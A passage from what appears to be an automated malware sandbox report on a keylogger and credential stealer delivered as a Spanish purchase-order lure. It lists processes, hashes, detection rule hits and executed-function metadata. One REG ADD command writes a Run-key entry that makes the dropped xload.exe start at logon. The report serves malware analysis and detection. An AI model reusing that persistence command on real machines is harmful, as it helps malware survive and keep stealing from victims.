MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:06:29
Start date:	12/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe"
Imagebase:	0x370000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:06:46
Start date:	12/09/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 24
Imagebase:	0x560000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:06:49
Start date:	12/09/2024
Path:	C:\Users\user\AppData\Roaming\xload.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\xload.exe"
Imagebase:	0xe10000
File size:	814'456 bytes
MD5 hash:	FEC61E105CBB213BCDB38AF0DD1EC8BA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:06:49
Start date:	12/09/2024
Path:	C:\Users\user\AppData\Roaming\xload.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\xload.exe"
Imagebase:	0xe10000
File size:	814'456 bytes
MD5 hash:	FEC61E105CBB213BCDB38AF0DD1EC8BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000011.00000002.2317328552.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000011.00000002.2326278811.0000000003BF3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000011.00000002.2326278811.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000011.00000002.2326278811.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000011.00000002.2317328552.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	15:07:07
Start date:	12/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x4b0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2614654788.00000000029A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000014.00000002.2614654788.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	15:07:09
Start date:	12/09/2024
Path:	C:\Users\user\AppData\Roaming\xload.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\xload.exe"
Imagebase:	0xe10000
File size:	814'456 bytes
MD5 hash:	FEC61E105CBB213BCDB38AF0DD1EC8BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000015.00000002.2518447949.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000015.00000002.2518447949.0000000003AE3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000015.00000002.2518447949.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000015.00000002.2502322586.000000000298C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000015.00000002.2502322586.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:07:26
Start date:	12/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x840000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000016.00000002.2614850427.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	16.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10.7%
Total number of Nodes:	28
Total number of Limit Nodes:	2

Executed Functions

Function 06B741BF Relevance: 5.6, Instructions: 5644
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b5bcad7279a3aed889a906673190f3fa31876531c15816231b6ef18345729e2
Instruction ID: 86516cfb357d0d431de08401fd6ae836da084f27be65650c24dbee17490e8ac1
Opcode Fuzzy Hash: 0b5bcad7279a3aed889a906673190f3fa31876531c15816231b6ef18345729e2
Instruction Fuzzy Hash: 91C31770A11618CBDB58FF3CDA8866CBBB2BB89701F4048E9D048A7254DF35AE95DF41

Function 06B741D8 Relevance: 5.6, Instructions: 5633
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f982c89340856f1f38253cdf9dd29d634b3bae65792dcb129822b6bdcbe675c6
Instruction ID: 715b6d7567b1d7209f306d2dd45f3589f1a68cdeb79645a9098ce8a2aac97e16
Opcode Fuzzy Hash: f982c89340856f1f38253cdf9dd29d634b3bae65792dcb129822b6bdcbe675c6
Instruction Fuzzy Hash: F4C31770A11618CBDB58FF3CDA8866CBBB2BB89701F4048E9D048A7254DF35AE95DF41

Function 078F45B8 Relevance: 5.2, Instructions: 5170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1545219249.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2080c48db3625c0a5ddb9e3dd91d8b048de3f5dfc6b6b0cb98b60cf74e6a411
Instruction ID: a7209c675aadb08ef681b627ba3157d41d76ed8043c6b17bb76f35a10c8a4ca1
Opcode Fuzzy Hash: e2080c48db3625c0a5ddb9e3dd91d8b048de3f5dfc6b6b0cb98b60cf74e6a411
Instruction Fuzzy Hash: CCB31670A11618CBDB18FF38D9896ACBBF2BB89300F4085EAD488A3254DF355D99DF51

Function 02148448 Relevance: 1.0, Instructions: 950COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 030b9fc8d3f97e5ee5bd383fcc6727adf264e35e71086c1e12bea91ff8a4fc4c
Instruction ID: 1778c0911c28af4c0665420f456ade852c941294e4b4152e910c7adfd60cae37
Opcode Fuzzy Hash: 030b9fc8d3f97e5ee5bd383fcc6727adf264e35e71086c1e12bea91ff8a4fc4c
Instruction Fuzzy Hash: 48826B70A40219CFDB14DF69D984BAEBBB6FF88304F158169E809AB351DB35DD42CB90

Function 02149220 Relevance: .9, Instructions: 905COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ce2560e99fe80506f886f82440bb10cbcd3b24b073eeca958e8c8d06a5eeea
Instruction ID: 283459b55f353aacec0a4f402f3014bfee291bd2ac3a3140ce81921807f3ce62
Opcode Fuzzy Hash: 08ce2560e99fe80506f886f82440bb10cbcd3b24b073eeca958e8c8d06a5eeea
Instruction Fuzzy Hash: 87824B70A40209DFCB24CF68D584AAEBBF2FF88315F158569E4199B3A1DB35ED41CB50

Function 078F0040 Relevance: .7, Instructions: 656
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1545219249.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f725efdcce7f530c6c16a9b7ab6f9086b19d5dbdf0357d4048c0405401d5be7e
Instruction ID: 7b474900442cb60ed2d422fe47e3d6b0aa6e2201e283ad2ccb91de2838758eb9
Opcode Fuzzy Hash: f725efdcce7f530c6c16a9b7ab6f9086b19d5dbdf0357d4048c0405401d5be7e
Instruction Fuzzy Hash: CB22EF70B006048FDB54AB78C86477E77A7FFC9260F248569D11ADB3A1DE38DC468BA1

Function 075245E8 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf3ec02c8e1e02496978585e00a57585183c3e2afaa14ad16871cf105133bf0
Instruction ID: 65ff4138b41d32afd1217e49d0676e49bcd03ad2e8452b7830e5a29086a4841e
Opcode Fuzzy Hash: fdf3ec02c8e1e02496978585e00a57585183c3e2afaa14ad16871cf105133bf0
Instruction Fuzzy Hash: 5B528D30A00359CFDB14DF64C844B99B7B2BF89314F2582A9D5586F3A2DB71AD86CF81

Function 075245D8 Relevance: .6, Instructions: 589COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ababa030221b798116dc2a882a43258a08e5a688c185c5ccd71fcc0361d0f8ef
Instruction ID: 41afba31aaefc2a45901ca8f702569d4b14824614366f225ed0e14c8855fe2ae
Opcode Fuzzy Hash: ababa030221b798116dc2a882a43258a08e5a688c185c5ccd71fcc0361d0f8ef
Instruction Fuzzy Hash: BD526C34A00359CFDB10DF64C844B99B7B2BF89314F2582A9D5586F3A2DB71AD86CF81

Function 078F3CC0 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32(00000000), ref: 078FC2C0

Memory Dump Source

Source File: 00000000.00000002.1545219249.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: a39a88355ac47b689862bc24b5bf45fe2275bb06a30aa474e558098afd6ebacd
Instruction ID: db57ea1b380698fe173f3dcb7c807b74ec8e36377fedcf26bfc3f77984e439b4
Opcode Fuzzy Hash: a39a88355ac47b689862bc24b5bf45fe2275bb06a30aa474e558098afd6ebacd
Instruction Fuzzy Hash: 4C2135B2C0065A9BDB10CF9AC94479EFBB0FF48320F10852AD918B7640D378AA04CBA5

Function 06B301F8 Relevance: 1.5, APIs: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06B3B725

Memory Dump Source

Source File: 00000000.00000002.1544592389.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a94217eb5bc9cee33d7daa3aef052f4ac6e3e9efd71068e1816a690a66c5266e
Instruction ID: cad1e73b3817cac1822c89870f32daf2e7216eca0e1d97627eeca2d97b8e6cc9
Opcode Fuzzy Hash: a94217eb5bc9cee33d7daa3aef052f4ac6e3e9efd71068e1816a690a66c5266e
Instruction Fuzzy Hash: A71122B5900348DFDB10CF8AC988BEEBBF8EB58314F10845AE958A7200C374A944CFA1

Function 06B3B6C0 Relevance: 1.5, APIs: 1, Instructions: 46
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06B3B725

Memory Dump Source

Source File: 00000000.00000002.1544592389.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 595a129351e00083312e81383da635c06ce7ca0b7deb48d6030912f21d06cf5a
Instruction ID: 93d3e9e2f690e8790940c751d7ed6f20c82ae664d38b5afa7ecbc378a8739d27
Opcode Fuzzy Hash: 595a129351e00083312e81383da635c06ce7ca0b7deb48d6030912f21d06cf5a
Instruction Fuzzy Hash: 9C11F2B5900649DFDB10CF9AD984BDEBBF4EB58314F10885AE958A7700C375A944CFA1

Function 06B73E6B Relevance: 1.4, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D, xrefs: 06B73EC2

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: dc1d171513851efe3e9a74e7328eae67e1918dc9674fe98772bca67ff975e8ad
Instruction ID: 33569939ea4a0096036d3c4603110b8b95ff770f12eee3429a61c53f17e8b973
Opcode Fuzzy Hash: dc1d171513851efe3e9a74e7328eae67e1918dc9674fe98772bca67ff975e8ad
Instruction Fuzzy Hash: 083154A140E3C65FC70387748CA46967FB0AE57114B1A02EBC0D1CF6E3EA180D0AC7A3

Function 0214A2E8 Relevance: .8, Instructions: 812
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 120c00c3a33d495923b728330e7be3d92703de2541f087e1310f4cd8c6661515
Instruction ID: 50ca9a01b68cc7d8aa7044f1a32ab0d612fcc61655d01ed4eac1648299be21b0
Opcode Fuzzy Hash: 120c00c3a33d495923b728330e7be3d92703de2541f087e1310f4cd8c6661515
Instruction Fuzzy Hash: A1722C74A40218CFEB149BA4C864BAEB7B2FF88300F1481A9D51A6B395DF359E41DF51

Function 07522268 Relevance: .8, Instructions: 785COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd11308130f4d022ab6b09c61f7d44a4785c7b8b59fa26bf954d40b8ef50dc38
Instruction ID: 3d25465a8e3ec9fd18d38579f51f721fcc39b20dbc666352fcff2fb006209810
Opcode Fuzzy Hash: bd11308130f4d022ab6b09c61f7d44a4785c7b8b59fa26bf954d40b8ef50dc38
Instruction Fuzzy Hash: 3662DEB5E01B568ADFB4DB64D4683DE7AB1BB53304F11491FC1AACA3D0DB34A4439B82

Function 06B7C20F Relevance: .5, Instructions: 529COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74e4c187787e0ff4f066ecf0ab42b1a8e1fe5528bc0db770a8bc60061863c467
Instruction ID: 0482f9edf643082c0ef57354ad92f625e8c239149caf3a96405b2e2db784a02f
Opcode Fuzzy Hash: 74e4c187787e0ff4f066ecf0ab42b1a8e1fe5528bc0db770a8bc60061863c467
Instruction Fuzzy Hash: 9212E170A052448FE705FBBCD99866D7FB2BF89604F4048AED045E7396DB38AC0AD761

Function 0214BD90 Relevance: .5, Instructions: 476COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91a4704ecd90ca8944762dbe5fa5bc32c81e29891444030aef896fbcdbad64b4
Instruction ID: 55230d90cb29eb46b4d7b5af7b08a7d8ca9a8b10c5db1f861fd469e8d85f1c84
Opcode Fuzzy Hash: 91a4704ecd90ca8944762dbe5fa5bc32c81e29891444030aef896fbcdbad64b4
Instruction Fuzzy Hash: 98F1A430385601CFEB285B69C864B397796EF94A08F19406BE51ACF3B5DF69CC42DB81

Function 075222AA Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2bc1bd4ef6d66422c46cecdfc733d31f502f0b98bd96f2bff1c87feb31660fd
Instruction ID: a19e0dfda716d6b11f03dc141f4879b9d834e28d8b474fcda7b949cea957bddb
Opcode Fuzzy Hash: c2bc1bd4ef6d66422c46cecdfc733d31f502f0b98bd96f2bff1c87feb31660fd
Instruction Fuzzy Hash: EF226DF9905B934ADFB8DB64C4A42DE66B0BB17304F21491BC0FAC9395C734A087EB85

Function 06B7DD68 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da92ac35ab890c7c13d05c21f802b220e89f4f26b27f3e9b8b2c8ed81ac47b79
Instruction ID: e90c9ddba3af05c0e4fcdc2bbfede677de796377fd7ea13b813cce8b615a2e1f
Opcode Fuzzy Hash: da92ac35ab890c7c13d05c21f802b220e89f4f26b27f3e9b8b2c8ed81ac47b79
Instruction Fuzzy Hash: 84F1B170A10208CBE704BFBCE88866CBFB2BF88704F5549A9E445A7394DF34D85AE751

Function 06B7C2E1 Relevance: .5, Instructions: 453COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1923e8afe13292068b8efd9e9cd60342f34de5ee64837654c11d2c168a33a3f4
Instruction ID: 30f7d89ff80ef94849c3c9970edb3a1248b4a9948a9e57209b60b288e04e5977
Opcode Fuzzy Hash: 1923e8afe13292068b8efd9e9cd60342f34de5ee64837654c11d2c168a33a3f4
Instruction Fuzzy Hash: 9AF18B70A11208CFE748FBBCD588A6D7FB2BB88704F504969E449E3354DB34AD0AD761

Function 0752A294 Relevance: .5, Instructions: 452COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d277d1cfaac0bacd73b0533e4ce3c5b3a5abb9cc56a6de0f4e242bcb49c95553
Instruction ID: 8448ddafe4b7efc31694385748a5b961af2c667140f0043be62ad8a8298babe9
Opcode Fuzzy Hash: d277d1cfaac0bacd73b0533e4ce3c5b3a5abb9cc56a6de0f4e242bcb49c95553
Instruction Fuzzy Hash: F4022570700215DFDB44DB68D498BAD77B2FF8A310F5585A9E40A9B3A1DB34EC86CB90

Function 06B7C2F0 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9487eef2457512cea1ecdc200b4aa33a84151ce019b2a729dd590c2428f23bda
Instruction ID: d842202b88473f625ed85fe00468e3921d58a2c764b50891199b8697f49b7897
Opcode Fuzzy Hash: 9487eef2457512cea1ecdc200b4aa33a84151ce019b2a729dd590c2428f23bda
Instruction Fuzzy Hash: E6F17B70A11208CFE758FBBCD588A2DBFB2BB88704F504969E449E7354DB34AD0AD761

Function 06B7D680 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 864438a5c098e6a05989448e3002fd3e0db0745652316e64edbb221ecd1a2611
Instruction ID: 5b534848786585a9303cf815b11a62949085d84becaa0b78edfa8ce1ae312f2a
Opcode Fuzzy Hash: 864438a5c098e6a05989448e3002fd3e0db0745652316e64edbb221ecd1a2611
Instruction Fuzzy Hash: D4E18071A102088BE704FBBDE98866D7FB2BF88750F844969D445E3358DF38AC49D7A1

Function 06B7DC65 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e9486cfca7785560d353e45546b0675856c37627cb3da9e747d5d38c21c4c4a
Instruction ID: 8c00ac4b1307ba646eb07dc7d1ca1b9da61a7faf76fe68745d82c2a7e64d7195
Opcode Fuzzy Hash: 9e9486cfca7785560d353e45546b0675856c37627cb3da9e747d5d38c21c4c4a
Instruction Fuzzy Hash: 62E11B70A183848FE716EB7CD85866C7FB2FF46304F0944EAD485D7296DB38980AD762

Function 021479B0 Relevance: .4, Instructions: 430COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fba3253384e682cb122eaaec6dabe7f34084ab99ef257c9d4703215bca575e4
Instruction ID: 1892efd1a6132d8b224e4ecd984312760dcebfb05944aa06dd47c2f7cd28ea22
Opcode Fuzzy Hash: 4fba3253384e682cb122eaaec6dabe7f34084ab99ef257c9d4703215bca575e4
Instruction Fuzzy Hash: D4E1AC307402159FEB18AF68C958B7EBBA6EB88350F148529E50ADB3D0DF79CD42D790

Function 06B71D28 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 107dec24d5628fe4c35685e96670398139d41230ca747b895061b420ce910c08
